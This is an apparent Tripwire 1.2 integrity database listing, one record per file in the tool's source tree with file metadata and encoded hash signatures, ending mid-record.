/tmp/genek/tripwire-1.2/configs/conf-motoR32.h 0 00007R 100600 25406 1 856 856 993 0kOiuu 0k9cpJ 0kOiuu 0 2WdC:BCl:nVIQCeWQ9Lp3H 3WSukojkpZdUut:nUOhSR9 1SB:C0 0007k1 3lsAcrUH9GY5c3Y::Mb.VZ 2zvnlRzGKlEA5GcV:YQTWH ETy27tQ775cVgbykFQR6nD4z05D 2:VegMQgE.v6YHDuz:f4Um 0 /tmp/genek/tripwire-1.2/configs/conf-motoR4.h 0 00007R 100600 25407 1 856 856 875 0kOiuu 0k9cpK 0kOiuu 0 2f7JS.Yc5E0IhlMdqzeYvr 1.scpOaWyIHZTilRqq8Ybk 0DQrPx 0009:T 05CkPu6EGU.KndcVxO4Vl2 3rsdpgpLG5xWZ.YSKgXrJ. 
0E4XT2jMNJBjijCnTaZY023R0JN 2Joi8kF2chqiLu98.gwXjX 0 /tmp/genek/tripwire-1.2/configs/conf-odt2.h 0 00007R 100600 25408 1 856 856 937 0kOiux 0k9cpL 0kOiux 0 09oQ4a.GkVrQS:2hR:z9JH 1dCsFKVm95.30vqIufCeF3 1LtBxY 000Bbu 0QtIB.eDo7wYTPu1ZFwC8p 2a:m1eWUDbyVcFnuRbpdk2 2jRsk:QhWqqfpuMMzloTEC6DJ7m 3jn.9kpakLQbxOWahaoefx 0 /tmp/genek/tripwire-1.2/configs/conf-osf1.h 0 00007R 100600 25409 1 856 856 919 0kOiux 0k9cpN 0kOiux 0 3l9eP13oeSmCSNyJ.zo3YA 0Xozuj6fWEi47laiT0V::F 2VG:Mw 000DVY 1a8t13t.dQ1ebf9aYM95:Y 26DR050fIw5gkTY6O3vMPK BMEOWyrxrJy1gePjJQzPoFZ4Bc3 2X..VDMIKWWL7wMIUBj4W3 0 /tmp/genek/tripwire-1.2/configs/conf-osx-att.h 0 00007R 100600 25410 1 856 856 753 0kOiux 0iSmya 0kOiux 0 3rHECjwTV:pjXP3jDpTStf 2xs9uexv5H7BhJwvgemtys 3HzyQq 0008iO 39qOWEFsBWWiaesN.K5x:5 1RJMsgrDGGl:Ms3PB1ZS6g FvWs5HhLHgiaKLx3xJqYy7UNiKS 3ObYLpdepmIes7FrubFLGL 0 /tmp/genek/tripwire-1.2/configs/conf-osx-ucb.h 0 00007R 100600 25411 1 856 856 804 0kOiux 0iSmyc 0kOiux 0 2QWH6Ku2f9ACzLcaLLdxcH 0.jtiemVGvJs9fsjg3DSj4 0YX9mK 00068w 2Eo53z1GQE:kRDMFRsGhxc 0yCLr11o:XWLnsgH4xunYL 8r6Y:KdSQJ:Rn1gfsGkBSVYu.Fu 1YnFmZoVlacZnvWOXaL0WZ 0 /tmp/genek/tripwire-1.2/configs/conf-ptx2.h 0 00007R 100600 25412 1 856 856 2419 0kOiuy 0iy5v8 0kOiuy 0 3uAfhUO1RrKsSXEckddiML 1.eaxCroyzV0A:KqvB5ejP 03FxGH 000AqJ 1jAHPFXwT7kLzitLE:GJcC 2xQDhZLCb3:9om81g0fZpR 4d71Riqk9GjvCna5.ZpCZA0EpEc 002hvFC9.KWEk2G55oFhwR 0 /tmp/genek/tripwire-1.2/configs/conf-riscos.h 0 00007R 100600 25413 1 856 856 958 0kOiuy 0iSmyd 0kOiuy 0 2BF85vZuIvatY.EX3zSNFK 1LJhgziqKFxukRm2ccVizX 30aE9p 0000bw 0eeKmXJp70RYE5vJ4dzuLf 3ffPabKUc0Le0LhvbbKSdw EKNA9RArLVW2MIqD2V4J1Jz1QW. 
2QsKduuImp7eBcSrrv41J1 0 /tmp/genek/tripwire-1.2/configs/conf-sco.h 0 00007R 100640 25414 1 856 856 954 0kOiuy 0jQRWM 0kOiuy 0 1VXe06iJRLZNiG:iQjnNMN 1ac9qYGyATsUJzpGfkM2Ll 2WZss2 0001mp 3ao09R7eOWYtLqoPW6:RZW 2GoL767857:Pf71VIkKyiP 55EQkL5DwM57:.28DRN4VRz:lLk 0:LtNUuNwEMts3cDsI3bOs 0 /tmp/genek/tripwire-1.2/configs/conf-sco2.h 0 00007R 100640 25415 1 856 856 976 0kOiuy 0k9cpO 0kOiuy 0 2o0maLMP7zcZj1yCa0Pejp 165FPmLP8fEwD.GTcxBkuF 2Pty4P 0005mc 2F2gdoPLn62SMpMMo8WV4C 2NgrhuTwAYixSZLj30ys:8 0UgVbgx7d8AFJfKsYgaiXsbBQbR 2poGG2MUnAJNG5UhtGAIfM 0 /tmp/genek/tripwire-1.2/configs/conf-sunos-4.0.h 0 00007R 100600 25416 1 856 856 912 0kOiuy 0iSmye 0kOiuy 0 3mRyE9PO2v6fEju5te5evY 2ps9EOhlLg4Bwr:6QVZkaI 1Spi7J 0003pG 1ttIaCZXhHkYTSBdnSmV7G 1KH.BcEz1a0sa5ao8zNacr 3bq0Opgyj6iQhWyivovhfC:paCR 1vdKUOiZ9a1UEDUr2v5BOC 0 /tmp/genek/tripwire-1.2/configs/conf-sunos-4.1.h 0 00007R 100600 25417 1 856 856 907 0kOiuy 0iSmyf 0kOiuy 0 04wR.UU4P5chQKo8lYaoMD 0JMaV7vK0uzTrMSMD1DOQ0 1tWI89 0008ZJ 2mk1kCwWiMms:uxK4msh6a 1521w5gcuz7BlG07xv6XiL 8B3OqnIQsKHPrII.m4PM2:IZiCR 23fUiLUepqjFk9fxHQ:lf5 0 /tmp/genek/tripwire-1.2/configs/conf-svr3.h 0 00007R 100600 25418 1 856 856 934 0kOiuy 0iSmyg 0kOiuy 0 0:DA9AkZvXNA2ufJ3ECG8: 33ERtI6.9GPkb1.nlnnkDe 0xcEZJ 0008DO 2VoTEUKA:pYf9WKrizYG9n 2mgF3P2PDKRpjH00pBxmmY DYmHk.HMT.kl9xndCwy66DThKTd 3ElCTY3VWaguTQQGINDkUX 0 /tmp/genek/tripwire-1.2/configs/conf-svr4.h 0 00007R 100600 25419 1 856 856 874 0kOiuz 0iSmyh 0kOiuz 0 1HMQlwkOqERaHkqPVvjZ.X 2SCnXaTXpiCxfRePb5C7Zu 3ogc7m 000Aa1 1q:pnl2NROV8:ACaKj2XQp 1sWqAxK6ZUBv1KVLeabP4o DWlMtKB4tzv:1jJP0eR4MRNlVwO 2QW1rq4FroOYc0u2AHmSBU 0 /tmp/genek/tripwire-1.2/configs/conf-umaxv.h 0 00007R 100600 25420 1 856 856 1098 0kOiuz 0i:vym 0kOiuz 0 3C1QUAC4G9c73zRRNYq0GC 137GGWkrz5LtpppkxSZaau 013nsa 000Cgr 0DDhz7yk6zQNq8NVyhvjeJ 39pCt6lUcD0I7qeTVcAn0r 0VPs665RhGVT1k4WNii.7ZHSRF2 3l5b7R9Ve.Jma2No09Zutd 0 /tmp/genek/tripwire-1.2/configs/conf-unicos.h 0 00007R 100600 25421 1 856 856 1032 0kOiuz 0iSmyj 0kOiuz 0 0rmsgxoKXCgd8WnQ4gwRQ4 
1BfS5HQvZIFUELtq1JkfuT 084tCI 0007q7 3DyU88sSZKHMdnLqX2BcFS 3pTRSBflAGUxIByX5oROYb 5G5AAgMhN0L9Oq4Ye1lO:a.KeFu 0HvnygamBN:rUph6nxPx9W 0 /tmp/genek/tripwire-1.2/configs/conf-xenix.h 0 00007R 100600 25422 1 856 856 1070 0kOiuz 0iSmyk 0kOiuz 0 25vkUPl2g:fBnKjJ:DBdTp 3r2N5z8leZC34F7MTFN1sG 3y8hdW 000DtX 2QmznWgqBT1hLANZRYfFuJ 3RFRrtTlmXly1gnijHkBtr A0h58rtkYHR8Jpl5Lo9jWK0Ha3T 0Lis07kQ55eLTVJQdN4rhs 0 /tmp/genek/tripwire-1.2/configs/tw.conf.386bsd 0 00007R 100600 25423 1 856 856 3678 0kOiuz 0iy5v9 0kOiuz 0 2TcPxMgOIFP21iIuzgyOVA 0G:iqTvW66wiHOrOQR8OTz 07rufZ 0003x5 1lD.UutmtuhglXcOIAFofK 1jqeLHXiqPFfbrPZB:juAq 7nzPnCpqwnsiu:RF3T3b99fhYWq 1eVFNrqlaaMLUS3DNOWDbJ 0 /tmp/genek/tripwire-1.2/configs/tw.conf.apollo 0 00007R 100640 25424 1 856 856 5003 0kOiuz 0jQRWN 0kOiuz 0 29ZCtgH5p.EG7z7nFWJ34m 31trQkC8H51uhfkg8tVUNd 00MpfB 0002JX 19WnsY3aLQ.tY9:Gzu0nKv 27Z9MJ.8AVCL7YVd0pgysg DbWmUcvCQQwuI5gxevliG6E8pQW 2BuegOJN4Pp4R5sw8:V1RB 0 /tmp/genek/tripwire-1.2/configs/tw.conf.hp2 0 00007R 100600 25425 1 856 856 5475 0kOiuz 0iSmyl 0kOiuz 0 3N8U09eDu:bTghWSBKjbHO 3M8vKQORYXdJKOVYUsWJLS 2wp5Lv 0001hy 3ewiLbfZ7P1u.ZN0Q2L8Mk 0j8SBWNmpUrOjrVwAWiFnr 8ImDxKJyTLS1uktnuRlx00YDFhH 0RO1Brkfmf51cF9k51p9Ca 0 /tmp/genek/tripwire-1.2/configs/tw.conf.hpux 0 00007R 100600 25426 1 856 856 1836 0kOiuz 0iSmym 0kOiuz 0 1eczSe9YSkxvFam3:C0Vuj 18vLvlIX1w9ZRm0D6m1JA5 20bYfK 0001BT 1IpuiZMAQVdzkgY6jQlCkh 2wRkk0f4IYxlEUMnV2LuhT EFpwtv70VmrJJ2uw:Zst63qtwhv 3B8pmG5NTOdfNXn30UWrZu 0 /tmp/genek/tripwire-1.2/configs/tw.conf.irix 0 00007R 100600 25427 1 856 856 6331 0kOiu: 0kG6GH 0kOiu: 0 0lnBzYqNtyy3o5dlZTAr2X 2G2oRcqibwCam:L2iMNpc. 
0f1EoW 0000:0 1OWjucEuoT9kjEUUtcFreT 1GdIlpXcnRCBeb.qYx582V 9ZUlxFOiM0WuW7CO8OFZqWesuWC 10i06BrA2j1mVOqIwbz1Hd 0 /tmp/genek/tripwire-1.2/configs/tw.conf.linux 0 00007R 100640 25428 1 856 856 309 0kOiu: 0jds1x 0kOiu: 0 2IeegJS.bBF3FAvM0bke:Z 37vBaHNjm.VR:2cTeIb4As 1LVGUZ 000CRr 1UiMHHU.kUD6Axd85oMKgc 3gHXTzHZVK7Cgzm6OP1.S4 AbY:2:ku1CfhSmd2ndqYCpP4WWm 1JqS4U9NpS0sHXodM.zR8A 0 /tmp/genek/tripwire-1.2/configs/tw.conf.next 0 00007R 100600 25429 1 856 856 2952 0kOiu: 0iSmyn 0kOiu: 0 1B8FUdtuno6R7qKinv3Evt 235NE1JJvZkW651L4NNeWD 2RGuy: 000DPG 0T7KsIfrbl5VwG6Ja4paI3 0PjTzlsiyF91YVtTPxENLY 86aNKPYau3tMW84RkKP1klsTSjY 1LnbZjVKtnO6WjMdyFYoLG 0 /tmp/genek/tripwire-1.2/configs/tw.conf.s5 0 00007R 100600 25430 1 856 856 4787 0kOiu: 0iSmyo 0kOiu: 0 1wJFYQMwbkMfXH6YDr66B2 1hrWea2V5nWQQzGtIEknw7 3qEbRa 0001uf 2O.LxYwuGUKJjLzAcj7qJG 3tLewdocDCWNLWqyc:ziIh 6:Zm3IA0AZBiB7xS.bMEvNcImK0 079AExv1KJKo.xYax3tvkT 0 /tmp/genek/tripwire-1.2/configs/tw.conf.sun 0 00007R 100600 25431 1 856 856 4483 0kOiu: 0j39g2 0kOiu: 0 3IVnG95tg7gPFmEB12vD9X 1qeKheqI5pVx8994YNdake 3Nb7D9 0005mP 2fMnOzjmyONLE.uIt5oymW 3kT0VTSBoLgNtaTEq5kkHK AcxH20WxA1as8WdiMWK9LrP.oOT 0LoACwSFp::vJDMwyYjkKy 0 /tmp/genek/tripwire-1.2/configs/tw.conf.sun.old 0 00007R 100600 25432 1 856 856 5359 0kOiu: 0i:vyn 0kOiu: 0 10wQz3jvJFPertcFQBAEjG 0soAHJYpU7xg7lN9lb93LA 1GOpWn 000ATF 3pqj5vQvgdmUh3plQyWV1. 
1IABFDGysZMUk:Nv6mh5xS EFHBfSiYYLQgK202nndyO4CSRDR 2e4hpe786dVx84bx.4LqJ5 0 /tmp/genek/tripwire-1.2/configs/tw.conf.sunos5 0 00007R 100600 25433 1 856 856 5151 0kOiu: 0iSmyq 0kOiu: 0 33FWGjowTLQTrSMXvnLuzf 2iIKlvp1P2wGQbYsb8wLpk 0RjCBs 000DHS 2bW1eLk6GJ3rawy.NkASIx 22wkRVPFNrhzeQxU1Iejww 6v70YYp8g9NyUS3kQ3FSjmPCwL0 0LIEiP.wbTUoqi5:JTvAX9 0 /tmp/genek/tripwire-1.2/configs/tw.conf.ultrix 0 00007R 100600 25434 1 856 856 1352 0kOiu: 0iy5vA 0kOiu: 0 0ZoTP0ndyJ2AMeH7OSzSto 2nh5P9NQ.exaP:o6Z4JKsC 3t0jRu 0008Dn 0h3MvaZKb15lGezbYTqgkH 0MWPk7RkIi8yftn3lnbOch 1.2UFgWNzVnxtUDvRBZWlcjagmV 3hMWIWa8xXXQTkECabYiij 0 /tmp/genek/tripwire-1.2/contrib 0 00007R 40740 27693 2 856 856 512 0kOivL 0kOiuN 0kOiv1 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/contrib/CheckConfig 0 00007R 100700 27695 1 856 856 618 0kOiu. 0h4KJb 0kOiu. 0 10RF2YnvAhKKxuWjU6b3Yf 1wloxZRW07PD:Kjn6HXaqy 1pVDDr 000Bcc 0XisyjeTuUg:g1qr1inXf8 3d5hMUzYTjBRbUN4XUaNJp Aso8s8edZtJy4qJpqoO.rB0DcuE 0Ywr0XHb6JWhJOszMFbtEk 0 /tmp/genek/tripwire-1.2/contrib/README.ASET 0 00007R 100600 27696 1 856 856 27318 0kOiu. 0j2F2R 0kOiu. 0 2Caw161MqbozX5CAWgTQe7 1gn:JQSXkjCflvmtYuiIlo 2zyeJH 000CLt 0JeoT55ZUTlSZTj0Zyl.jw 1q5RO1hT0mCDM05POD0viX 3T3mJ3T6ShApvOsHWHG:hQgRL8Y 2VZ9sRXyM.drppMBHGuRPS 0 /tmp/genek/tripwire-1.2/contrib/README.CheckConfig 0 00007R 100600 27697 1 856 856 1216 0kOiu. 0j2dOg 0kOiu. 0 2RrqoiNx05nAT1:JYhR4pq 3LsZehz8LIBcjmC8i3sEAG 2ctVd6 0008V. 2vrftluxp5TUmBWEN4Fi6d 3ieMHRoSmtpCUQN0UZneRI DuwvMh9xPlxG7ZPsArbcHRn7500 26m3qXeXWUsPO49GTwSnVA 0 /tmp/genek/tripwire-1.2/contrib/README.TRIPWIRE 0 00007R 100600 27698 1 856 856 3136 0kOiu. 0h4KJb 0kOiu. 0 10wg2R..T:FgJqUa443b2l 0OCcb7I0HvrOOs42ywbvw8 0cGfQy 00020q 3Qxar0TctuFCZMOCVTFGvz 1uu4XcLOVzzK6LmiXd1shR 9xbjVsxlo7qEzfHjatsdg7MmosC 0Yp5v5aQzP5TAGG4DkWbl1 0 /tmp/genek/tripwire-1.2/contrib/README.cdf 0 00007R 100600 27699 1 856 856 8329 0kOiu. 0jds1z 0kOiu. 
0 0LEbUVtOF9ctsFZnHmIIdY 2JZMGP8Vgct:db7ixu1WWX 3UCK.Y 000Fnj 0gOZhE35Z8b20ojZttGcXK 1FUBQx9dlJ.xufhE5LJ33a 3yYWVf9LTGSFhXotWrA6DSjBDie 0WMP7H2SnkTWQlFZa7ZARF 0 /tmp/genek/tripwire-1.2/contrib/README.chk 0 00007R 100600 27700 1 856 856 620 0kOiu. 0iSmyx 0kOiu. 0 2fNxrN205BOq6Li4V:dzBK 3:nEehjivuQr3YgSaKS174 03vuPw 0007cK 2KNQjDZioHdIMRxVM9VqBo 2gEyLNuKJRBdF.4EXNGh98 BzE4M4.6JLAXWlIH.FVpiKcxhA7 3O0vcz0v6oelD0RNzcFRnj 0 /tmp/genek/tripwire-1.2/contrib/README.hpux 0 00007R 100600 27701 1 856 856 3504 0kOiv0 0jQlLR 0kOiv0 0 0n4Wi73U.Qo56.3FvqkWRD 2JlMQf7KEcwmQ734bnRK0C 0RBYqX 000CXa 3RpOiizUl0dbPQUKHPUzmJ 22cFPP:5jcqg0SOTLjF6ev EoJa2Gxcax:86g61.9k8ELkruK2 3V5LWYE45AwXyw3KjUgBnO 0 /tmp/genek/tripwire-1.2/contrib/README.linux 0 00007R 100600 27702 1 856 856 5015 0kOiv0 0jQRWQ 0kOiv0 0 0KwVesLnIl:daeOX5ihrhS 2E:VTsMvmbfyQqZ5eIikX8 3D7juG 000DQW 32Iq04.OM.lJ4LeQWe79jc 0d.zCFFBDLLSrEISpJVLSt BYK8woiyF2GU0gh9zxac6nRgnCU 12i5OcrxQmB:2eoSJl36:8 0 /tmp/genek/tripwire-1.2/contrib/README.zcatcrypt 0 00007R 100640 27703 1 856 856 225 0kOiv0 0iYGgn 0kOiv0 0 3sbFV1OYaUlr4XShCUCa2G 3.jhNaevTnpLANaQz.ZXA2 1qpW1r 0008TS 0BHjd3KprVBZvv.KzyUm.N 3agWW53eJSnGIAQl9u9ujk 9mcamns5sdxOd7RZep1lZ9qCnk5 3RtfaBrKSaSUOPcyW3JZFM 0 /tmp/genek/tripwire-1.2/contrib/TRIPWIRE 0 00007R 100700 27704 1 856 856 569 0kOiv0 0h4KJb 0kOiv0 0 3OTinLpnzpCbJE5C8Wr8:K 1MiNqXck3W0G:iFMEFT0N5 1VGJAT 0002BO 0n16al4k4DC3kNMKHfMIE6 3rm26clf1OdE1F8AqVwk1: 6aZTQE.SooT.U9Zc66gw9rlYsb. 
3sFbdeHk3EB2NOsfFEqU9k 0 /tmp/genek/tripwire-1.2/contrib/encore.malloc 0 00007R 100600 27705 1 856 856 24524 0kOiv0 0i:vyp 0kOiv0 0 0gJrF5bhwv36cNwwWSW4EQ 3Q3arijWWukbyncohH20yi 2U0OHB 0001vW 2e:W2Xj5T:6JCjfEh2gb7H 0.6EH0L65uWdMsgOCYFLtD 64DOVf24cO2LS.erUgFIabe1ktH 306I7f2D3AX3D3pEJcbQ9Z 0 /tmp/genek/tripwire-1.2/contrib/md4convert.sh 0 00007R 100700 27706 1 856 856 2262 0kOiv0 0iy6Vx 0kOiv0 0 3yB.NsHFFy0xUci.cai5oj 1tJPzfUT6kOndbCC4L8.Gh 1F9zwV 0006Xw 2oN4FrW9lB9qJ.n9HdaOte 0TI927:fN44xAUxqTN3.IQ 2Swyu72gN9bEtb4Nx5NdBV5fkNI 3lUme:ygner:OO9SIxXRxr 0 /tmp/genek/tripwire-1.2/contrib/tripwire.chk 0 00007R 100700 27707 1 856 856 456 0kOiv0 0iSmyy 0kOiv0 0 1q8KeYjgCBhWbvq4q1PBPT 0N6MWV.Unk5WHoBbWObjog 3l:44. 0007gn 20hojWd4TfynplmAfGJoNL 1iBoqABjzyLv7XNqVM50JT 1LH4j5f9Csj78mPsBrupoFWvmy9 2Ye1XhtVxMT2x7U08XHloZ 0 /tmp/genek/tripwire-1.2/contrib/twdb_newinode.pl 0 00007R 100640 27708 1 856 856 1910 0kOiv0 0kNQPX 0kOiv0 0 11f3RyHbd6IadYPp4EpDz5 2BixjqWV.ZFIA1pmQZ04RE 1GHMeW 000DEm 2YVzaMA7:ia0K9EU0xLAXV 16WGSh7ihuEujjqvh7GTtV 3mtEyhWZGIdDiVKQS4o6PHesIIA 1g9zUDpgTkpHnZfXQXGufM 0 /tmp/genek/tripwire-1.2/contrib/zcatcrypt 0 00007R 100640 27709 1 856 856 316 0kOiv1 0iYGgo 0kOiv1 0 1iKFIf:iBsZLOiL.iI41Oy 2VHNHFRcOBgyKJNbLEvqOE 1MHVyq 0001Xf 0Z6i7SKlsCgR:0060mpD9Q 0hvh9Gje6SBMibJr0SJ4qJ 9mWzUrndxVWD8DWkWG25xNSAngI 3pt5FaYYw3PL89B70qeFVD 0 /tmp/genek/tripwire-1.2/docs 0 00007R 40740 36123 2 856 856 512 0kOivL 0kOiuO 0kOiv2 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/docs/README 0 00007R 100640 36124 1 856 856 858 0kOiv1 0j2dgA 0kOiv1 0 0Jj5OlT66uog5MQKM5Rbvt 19R5RMDHG1sWe3m0S8RCiW 2R6wC6 000DFH 0hiSwDV:tVVYUlMwjvvBQQ 00BohZ44x:CVb5uXUM.Hgb 3JFTrqbkvX0l1nY9uruAfSfjIt2 2.wu7kX5ciy6lWgaPgsxc. 
0 /tmp/genek/tripwire-1.2/docs/appdev.txt 0 00007R 100640 36125 1 856 856 1281 0kOiv1 0kBSkM 0kOiv1 0 2LSDoa2d.jP0vkFOplPf74 28FOn8RqaJi3wEqLAmXbB2 0SwkAA 0005l7 322sVbEIGk4SCAfVSKKRAA 1h.A1rxTYi7dClAZNva:M4 0QBpdg3C3Q0o4:x8hZncrLycYjs 34IcaV0G2Z1u7b5xma8FNf 0 /tmp/genek/tripwire-1.2/docs/designdoc.ps 0 00007R 100600 36126 1 856 856 105842 0kOiv2 0kOir2 0kOiv2 0 2a7Ih7cx3oo.tsHQHL.NBY 2MXFzAln7zZGMluETa9wok 1WMKha 0009:3 1RAO6MRvHInPSOYSv0i.Kc 1zUpTVnDMuSd1E06PzltX8 BgF3Q7R5hYoMEvD8pbicle8TZRD 0nWyXy1d2IHGtLkkTSgkvN 0 /tmp/genek/tripwire-1.2/docs/sans.txt 0 00007R 100640 36128 1 856 856 911 0kOiv2 0kBSkN 0kOiv2 0 2ooVWvd4gSyctemZ1fz:.D 2i7MDN3KxnhBuXvDr8gN68 3dlFaW 000B5G 0Q7EKH9YQj7jtzRl803LCs 2S3IIIDWagcYt7VRcpfHn0 43KKpS6jXIOb7ZPfDAxkwNwXBMj 23hmfD:4lJ0ah1MW6HT5hM 0 /tmp/genek/tripwire-1.2/include 0 00007R 40740 59 2 856 856 512 0kOivL 0kOiuO 0kOiv3 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/include/config.h 0 00007R 100600 60 1 856 856 5051 0kOiv2 0k9cpS 0kOiv2 0 0vT2DM4d7sodFb1D1C:5K9 1Qn:u0brFXc04hWJ:aI3i6 2DhHlb 000CN2 1qr2.DVYzPVLeMtkOtC2E5 2WUa2SUxFcj:gIwX4MwK4X 0El77Fe7PWRgqQTmmT:SjilXPL0 2rpAqDLO.IEAInRL9MhGgS 0 /tmp/genek/tripwire-1.2/include/list.h 0 00007R 100600 61 1 856 856 1840 0kOiv2 0k9cpT 0kOiv2 0 1YMdfckJEuMJewrLKFL0L7 0AfW1rYrKYnjZDJaK9eXE2 3fdto: 000BpV 3VY5:MUjI44PdUwTFsu9VT 12wnqAL8oQxK.4LWUBeWfQ 8PpT6.f1OgRcxhbZWiuqWEm:ERW 3WtEpMgXeQMeGF.AowvcJh 0 /tmp/genek/tripwire-1.2/include/patchlevel.h 0 00007R 100600 62 1 856 856 84 0kOiv2 0jdq.f 0kOiv2 0 0nAbG92q1zhISFea3rnYr8 1yjsDdW:hvY8uXagILDbAO 1Gbolk 000EXd 2pl7l.KhV9YSNgVXhlYPYi 3Lt.mvDO0ihSdDaGYecUga ANSc6iHi5Q2Nc8GMfKW8u1gA160 1ntARrVI2jWIPVJcO:NYcg 0 /tmp/genek/tripwire-1.2/include/sigs.h 0 00007R 100600 64 1 856 856 612 0kOiv2 0j3q0w 0kOiv2 0 3sNHdz:IavClGuwcTv4YZl 38XhBH5b6BR7QJ8W:wAAOU 32cYbl 0000cp 3dpWDYUMbuzKJEwiyJzmmG 1:wpiSThh2mrfYZ0uxduzb 8oVYp4eYquxF6WMiTkGU.Cq9.Ki 0b3zf.7ZNgGl8euQFIiNMD 0 /tmp/genek/tripwire-1.2/include/tripwire.h 0 00007R 100600 65 1 856 856 8476 0kOiv3 
0kC:AI 0kOiv3 0 0Rb2SDdPqGZCHD21C9.ZUd 2TaliFBmBaLTD..EPmROF0 3ZCKA: 0005kW 05rB9kr7v1L7i2luzzD7wJ 2.doLl7uwbUMUiyscNbVoR BAJIXjQn1B8fqFHdNMCpaIoy50c 266xg3v103M3TuGI:Os4By 0 /tmp/genek/tripwire-1.2/lib 0 00007R 40740 2339 2 856 856 512 0kOivL 0kOiuP 0kOiv3 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/lib/tw.config 0 00007R 100600 2340 1 856 856 4232 0kOiv3 0iy5vE 0kOiv3 0 0HcduXYrGJDXIvL2jKnlaS 2nUmmAk9WZXJj0ZK4JPfEa 3Cor1B 000FGu 0FW6PM24nguxmf:YrHaIDt 174SledeRQ50TTEATIQpUH FyEYpgQ:FSp2OUYyp:2MirIDZtV 0GeAbaP:MOXb9XFkcsIC0c 0 /tmp/genek/tripwire-1.2/man 0 00007R 40740 3097 2 856 856 512 0kOivL 0kOiuR 0kOiv4 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/man/Makefile 0 00007R 100600 3098 1 856 856 312 0kOiv3 0kC:AL 0kOiv3 0 2GsoEfC91jL9p473Sggl.: 3CnugW.rE2aLJUsWbj.:CY 2:IauJ 0007qm 2QPUf5qKGbjq6SuazBv2:d 3fL2q3dY0sSX31ViJ75ZFK Fns873F8LbbifHLVKyxJxS0y4Hp 2EGzshcLW.ys0vROrhwdI8 0 /tmp/genek/tripwire-1.2/man/sigfetch.8 0 00007R 100600 3099 1 856 856 148 0kOiv3 0j2F2X 0kOiv3 0 3s0gvE4ff9feUs9srKWVx2 12CWtbT5ZeDyPup8dD2:AY 1uRPyb 000AeX 0BxFMhnuKrBdhAtf02GPy7 3kSNOricY1o0pWzxXX6pGO 1MsprIgRon:8uFHHTWTff2gkN66 3ruKuQxQ5PbgzyPwSvVlLc 0 /tmp/genek/tripwire-1.2/man/siggen.8 0 00007R 100600 3103 1 856 856 1681 0kOiv3 0kCzvE 0kOiv3 0 0EUiHsDRgF259Trmqttldn 0Qvf8qlTpd6YGaxnJ.Xq8b 2YAFNh 00020Q 0Hnnk3dfZVP0ThYcRTR7wx 04FSWnU2H3eQ1N63KFt1Rh 4uOP:97xyqxlnQs:3xNCBY57nIb 32aCKsf27p9LFgxAbPml.w 0 /tmp/genek/tripwire-1.2/man/tripwire.8 0 00007R 100600 3104 1 856 856 13378 0kOiv4 0kBSV3 0kOiv4 0 1jcSJXYIrdngjxDtDgzhb4 2UD1vcOMQ1L0UYdPauGj3d 2FYVBb 0007PO 1dEM4WeBZC:rDUppBDmNwz 1hE1zhdImqkjydcEGBu8Hm 9JqhgF4WROdR8bSoFXO3yZ7p5in 3lf6YcXDzMNTjlAts83xe0 0 /tmp/genek/tripwire-1.2/man/tw.config.5 0 00007R 100600 3105 1 856 856 9866 0kOiv4 0kCzvG 0kOiv4 0 1XRHJDO1Iq.Uxuw41tE8IK 1SG7yc.tqPkjZjmOVaocZZ 3g9VK3 0003d7 3OmWI6MPYvELp5Ks2zYdg1 3JXJ24wwxJLvdCOeF0uzkt FXMfxPFfG5J30daWZYqwRFw9k6a 0I9N3y8T7RhCm5ocYwiqjx 0 /tmp/genek/tripwire-1.2/man/twconvert.8 0 00007R 100600 3106 1 856 856 959 0kOiv4 
0jds27 0kOiv4 0 09SNq7tN.mczzrsRSJfORm 3GRRKno.n6KDP3Nj1MVk3h 2HNYW6 0001Wt 2c3fh52dj03j.SvdI3KIB8 3B:h9ai4453SoSYF.LGVLP 12yi0S.EGfTrFWUvzW5uE6YQ7xv 3hdhDO5uhFFmRK7E446yQ8 0 /tmp/genek/tripwire-1.2/sigs 0 00007R 40740 4706 10 856 856 512 0kOivL 0kOiuR 0kOivC 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/crc 0 00007R 40740 6954 2 856 856 512 0kOivL 0kOiuR 0kOiv5 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/crc/Makefile 0 00007R 100600 6960 1 856 856 242 0kOiv4 0iy5vI 0kOiv4 0 0sO:nqsDjwTDpPgdK.WuXG 27NwtC1apPtfHzWO0vzkFH 2m0VaH 0004AX 34P.:Jp1wkBkIn7hJRAVZA 3vWEUKAYQw:iltUKJEG5U: 9IVzIUUp0dY4cycIxdMlGhMD5QB 1hys0YYvI9TNWjuOAo:1Lk 0 /tmp/genek/tripwire-1.2/sigs/crc/crc.c 0 00007R 100600 6961 1 856 856 6607 0kOiv4 0kCzvJ 0kOiv4 0 2ERp57qjFDbblAH4Ahbksd 3vPkajsCuwtop3mpaWupe6 0IVcqA 000F7J 1.pkbNfeBDcgiDfEbpUjbI 0ytKB6qSDYdmgwfmQvkF5s 57JyUvqYPQewaM9BOQFB1NEv8A0 3Aga73n79sCYRquPgFSfuA 0 /tmp/genek/tripwire-1.2/sigs/crc/crc.h 0 00007R 100600 6962 1 856 856 75 0kOiv5 0iSmzG 0kOiv5 0 2sc6rl8IReHAQnvbYE5we. 
1nNiSIih.BRJlEfjIUiSOi 1RisQ1 00062h 0cXDv14MGoSu8MJYxSxev7 2Y9g2.DfAtvLh2xRj8RV5c 4LJ4SyAYlbqPrZzykwxhsg3WMAF 37lF25BySrEiDa2RlLtDDn 0 /tmp/genek/tripwire-1.2/sigs/crc32 0 00007R 40740 8502 2 856 856 512 0kOivM 0kOiuS 0kOiv5 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/crc32/Makefile 0 00007R 100600 8503 1 856 856 245 0kOiv5 0j2:bM 0kOiv5 0 0N27FYkE7H.rhyyP.CNHAZ 0H7QBosGw3XCF7PFIrQXXo 3Pkm5k 0001BE 3BrUNUJggnbxqteRLoBwkA 0XaKN0poIgyCqtZdSMk71D 7p6HdJucYDTqtsSjRs91wDCpqc0 3cN.ruoYIDdR:67yOlxtZA 0 /tmp/genek/tripwire-1.2/sigs/crc32/crc32.c 0 00007R 100600 8504 1 856 856 6982 0kOiv5 0kCzvL 0kOiv5 0 0xE7ds2CsIyBvQN4W5f:T4 0Onc5B8OOusnP71gd9LmGi 164eak 000CNN 